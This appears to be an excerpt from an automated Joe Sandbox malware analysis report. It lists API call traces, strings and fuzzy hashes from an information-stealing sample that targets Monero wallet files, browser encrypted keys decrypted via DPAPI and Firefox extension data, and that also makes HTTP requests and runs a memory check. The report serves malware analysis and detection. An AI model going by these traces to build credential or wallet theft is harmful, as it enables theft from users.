                                    • Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$Filelstrcat$AllocCopyDeleteLocalSystemTime
                                    • String ID:
                                    • API String ID: 3104408854-0
                                    • Opcode ID: 34b7f7fd13c14fe04b305e8af5718422da87fb3e68784adecc6e41f88a2abde8
                                    • Instruction ID: 41beab7536a86320c5536d1b0bf72fd012b6671822a7399f8aa4fad9a0d819c4
                                    • Opcode Fuzzy Hash: 34b7f7fd13c14fe04b305e8af5718422da87fb3e68784adecc6e41f88a2abde8
                                    • Instruction Fuzzy Hash: 70D17D728101189ACF15FBA4DC96EEE7338AF65300F908169F516720A1EF716B4CCBE6
                                    APIs
                                      • Part of subcall function 0019A110: lstrcpy.KERNEL32(001A0DFF,00000000), ref: 0019A158
                                      • Part of subcall function 0019A380: lstrlen.KERNEL32(?,013A8830,?,\Monero\wallet.keys,001A0DFF), ref: 0019A395
                                      • Part of subcall function 0019A380: lstrcpy.KERNEL32(00000000), ref: 0019A3D4
                                      • Part of subcall function 0019A380: lstrcat.KERNEL32(00000000,00000000), ref: 0019A3E2
                                      • Part of subcall function 0019A270: lstrcpy.KERNEL32(?,001A0DFF), ref: 0019A2D5
                                      • Part of subcall function 00198600: GetSystemTime.KERNEL32(001A0E02,013A9C08,001A059E,?,?,001813F9,?,0000001A,001A0E02,00000000,?,013A8830,?,\Monero\wallet.keys,001A0DFF), ref: 00198626
                                      • Part of subcall function 0019A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0019A342
                                      • Part of subcall function 0019A2F0: lstrcat.KERNEL32(00000000), ref: 0019A352
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0018D641
                                    • lstrlen.KERNEL32(00000000), ref: 0018D7DF
                                    • lstrlen.KERNEL32(00000000), ref: 0018D7F3
                                    • DeleteFileA.KERNEL32(00000000), ref: 0018D872
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                    • Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                    • String ID:
                                    • API String ID: 211194620-0
                                    • Opcode ID: ffff0d4b5dbd6aea8d9a645777ef4ca0f22a1caebc6f6fb2e2e3a9f120ad718b
                                    • Instruction ID: e7cb908ef9c3e7e4f93d5763296da5ad5197d74621094b94be294355ebce0616
                                    • Opcode Fuzzy Hash: ffff0d4b5dbd6aea8d9a645777ef4ca0f22a1caebc6f6fb2e2e3a9f120ad718b
                                    • Instruction Fuzzy Hash: CF819A729101089ACF05FBA4DC96EEE7338BF65304F904529F516A60A1EF746A0CCBE2
                                    APIs
                                      • Part of subcall function 0019A170: lstrcpy.KERNEL32(?,00000000), ref: 0019A1B6
                                      • Part of subcall function 00189A10: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00189A3C
                                      • Part of subcall function 00189A10: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00189A61
                                      • Part of subcall function 00189A10: LocalAlloc.KERNEL32(00000040,?), ref: 00189A81
                                      • Part of subcall function 00189A10: ReadFile.KERNEL32(000000FF,?,00000000,0018148F,00000000), ref: 00189AAA
                                      • Part of subcall function 00189A10: LocalFree.KERNEL32(0018148F), ref: 00189AE0
                                      • Part of subcall function 00189A10: FindCloseChangeNotification.KERNEL32(000000FF), ref: 00189AEA
                                      • Part of subcall function 001988D0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 001988F2
                                      • Part of subcall function 0019A110: lstrcpy.KERNEL32(001A0DFF,00000000), ref: 0019A158
                                      • Part of subcall function 0019A380: lstrlen.KERNEL32(?,013A8830,?,\Monero\wallet.keys,001A0DFF), ref: 0019A395
                                      • Part of subcall function 0019A380: lstrcpy.KERNEL32(00000000), ref: 0019A3D4
                                      • Part of subcall function 0019A380: lstrcat.KERNEL32(00000000,00000000), ref: 0019A3E2
                                      • Part of subcall function 0019A270: lstrcpy.KERNEL32(?,001A0DFF), ref: 0019A2D5
                                      • Part of subcall function 0019A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0019A342
                                      • Part of subcall function 0019A2F0: lstrcat.KERNEL32(00000000), ref: 0019A352
                                    • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,001A1524,001A0D7A), ref: 0018F38C
                                    • lstrlen.KERNEL32(00000000), ref: 0018F3AB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                    • Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                    Similarity
                                    • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$ChangeCloseCreateFindFreeNotificationReadSize
                                    • String ID: ^userContextId=4294967295$moz-extension+++
                                    • API String ID: 2768692033-3310892237
                                    • Opcode ID: 5c1a3e603ed3483bca1af5bb0ba05d6323eb57a6bd642c38e40f92bd26a8d7d8
                                    • Instruction ID: 05e7c4a2c5a253713a9d21a1c1ff88abebd081a847fcecaa35472f35aafcdf7f
                                    • Opcode Fuzzy Hash: 5c1a3e603ed3483bca1af5bb0ba05d6323eb57a6bd642c38e40f92bd26a8d7d8
                                    • Instruction Fuzzy Hash: 3E51AB76D10108AACF04FBA4DC56DED7779AFA5300F808528F81666191EF746A0DCBE2
                                    APIs
                                      • Part of subcall function 0019A110: lstrcpy.KERNEL32(001A0DFF,00000000), ref: 0019A158
                                      • Part of subcall function 00189A10: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00189A3C
                                      • Part of subcall function 00189A10: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00189A61
                                      • Part of subcall function 00189A10: LocalAlloc.KERNEL32(00000040,?), ref: 00189A81
                                      • Part of subcall function 00189A10: ReadFile.KERNEL32(000000FF,?,00000000,0018148F,00000000), ref: 00189AAA
                                      • Part of subcall function 00189A10: LocalFree.KERNEL32(0018148F), ref: 00189AE0
                                      • Part of subcall function 00189A10: FindCloseChangeNotification.KERNEL32(000000FF), ref: 00189AEA
                                      • Part of subcall function 001988D0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 001988F2
                                    • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00189D89
                                      • Part of subcall function 00189B10: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00184F3E,00000000,00000000), ref: 00189B3F
                                      • Part of subcall function 00189B10: LocalAlloc.KERNEL32(00000040,?,?,?,00184F3E,00000000,?), ref: 00189B51
                                      • Part of subcall function 00189B10: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00184F3E,00000000,00000000), ref: 00189B7A
                                      • Part of subcall function 00189B10: LocalFree.KERNEL32(?,?,?,?,00184F3E,00000000,?), ref: 00189B8F
                                      • Part of subcall function 00189BB0: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00189BD4
                                      • Part of subcall function 00189BB0: LocalAlloc.KERNEL32(00000040,00000000), ref: 00189BF3
                                      • Part of subcall function 00189BB0: LocalFree.KERNEL32(?), ref: 00189C23
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                    • Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                    Similarity
                                    • API ID: Local$Alloc$CryptFileFree$BinaryString$ChangeCloseCreateDataFindNotificationReadSizeUnprotectlstrcpy
                                    • String ID: $"encrypted_key":"$DPAPI
                                    • API String ID: 549879638-738592651
                                    • Opcode ID: 295d7067dc2cf559a750860971aff9279f2ddb3a450aeba3c6ef6171ca0c56e8
                                    • Instruction ID: b5eea2731902e6fcc54bad8fb3e6b1ec649b144a38c84754e4d6039dc4890a7e
                                    • Opcode Fuzzy Hash: 295d7067dc2cf559a750860971aff9279f2ddb3a450aeba3c6ef6171ca0c56e8
                                    • Instruction Fuzzy Hash: ED311EB6D10209ABCF14EFE4DC85AFFB7B8AF58300F584519E905A7241EB309A05CBA1
                                    APIs
                                      • Part of subcall function 0019A110: lstrcpy.KERNEL32(001A0DFF,00000000), ref: 0019A158
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0019816A
                                    • Process32First.KERNEL32(?,00000128), ref: 0019817E
                                    • Process32Next.KERNEL32(?,00000128), ref: 00198193
                                      • Part of subcall function 0019A380: lstrlen.KERNEL32(?,013A8830,?,\Monero\wallet.keys,001A0DFF), ref: 0019A395
                                      • Part of subcall function 0019A380: lstrcpy.KERNEL32(00000000), ref: 0019A3D4
                                      • Part of subcall function 0019A380: lstrcat.KERNEL32(00000000,00000000), ref: 0019A3E2
                                      • Part of subcall function 0019A270: lstrcpy.KERNEL32(?,001A0DFF), ref: 0019A2D5
                                    • FindCloseChangeNotification.KERNEL32(?), ref: 00198201
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                    • Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                    Similarity
                                    • API ID: lstrcpy$Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32lstrcatlstrlen
                                    • String ID:
                                    • API String ID: 3491751439-0
                                    • Opcode ID: 39f1af4814737aae62e82f24ca9c9ffa4a2ceb9c4d493eced0dcca6f9ca48a10
                                    • Instruction ID: 53c8beca4edb6671318a4a42a1d0ba64916838c2522073fb131a0f6f97b5b23a
                                    • Opcode Fuzzy Hash: 39f1af4814737aae62e82f24ca9c9ffa4a2ceb9c4d493eced0dcca6f9ca48a10
                                    • Instruction Fuzzy Hash: 99316B71901218ABCF25EB54DC41FEEB778FF1A700F5041A9E50AA21A0DF306A48CFE1
                                    APIs
                                      • Part of subcall function 0019A170: lstrcpy.KERNEL32(?,00000000), ref: 0019A1B6
                                      • Part of subcall function 001862D0: InternetOpenA.WININET(001A0DE6,00000001,00000000,00000000,00000000), ref: 00186331
                                      • Part of subcall function 001862D0: StrCmpCA.SHLWAPI(?,013AE450), ref: 00186353
                                      • Part of subcall function 001862D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00186385
                                      • Part of subcall function 001862D0: HttpOpenRequestA.WININET(00000000,GET,?,013ADA48,00000000,00000000,00400100,00000000), ref: 001863D5
                                      • Part of subcall function 001862D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 0018640F
                                      • Part of subcall function 001862D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00186421
                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00194D08
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                    • Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                    Similarity
                                    • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                    • String ID: ERROR$ERROR
                                    • API String ID: 3287882509-2579291623
                                    • Opcode ID: ae6e904c275f251272a8abf170502a13b42da3a4835e9bf9ef24f5b5556dc2f0
                                    • Instruction ID: b95e58929e8ea42092437f702f3facb37db1f2c2eac37cdb7248233cc22fd087
                                    • Opcode Fuzzy Hash: ae6e904c275f251272a8abf170502a13b42da3a4835e9bf9ef24f5b5556dc2f0
                                    • Instruction Fuzzy Hash: 9A11EC34900108ABCF18FF64DC56EED7768AF70300F908568B81A575A2EB706B09CAD2
                                    APIs
                                    • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0018123E
                                    • ExitProcess.KERNEL32 ref: 00181294
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                    • Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                    Similarity
                                    • API ID: ExitGlobalMemoryProcessStatus
                                    • String ID: @
                                    • API String ID: 803317263-2766056989
                                    • Opcode ID: c5703376427ad1c38659670b25dd5e53df10d760981dd592ca346b06448c97ff
                                    • Instruction ID: f6bdd120332639c0290f42c782c5cce9ad408f262771bb6178b936a325705bce
                                    • Opcode Fuzzy Hash: c5703376427ad1c38659670b25dd5e53df10d760981dd592ca346b06448c97ff
                                    • Instruction Fuzzy Hash: 6601FBB1940308BAEF10EBE4DC49BAEBB7DAB14705F208449F605B6180D77456458B59
                                    APIs
                                      • Part of subcall function 00198880: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 001988AB
                                    • lstrcat.KERNEL32(?,00000000), ref: 00194A5A
                                    • lstrcat.KERNEL32(?,001A1040), ref: 00194A77
                                    • lstrcat.KERNEL32(?,013A8950), ref: 00194A8B
                                    • lstrcat.KERNEL32(?,001A1044), ref: 00194A9D
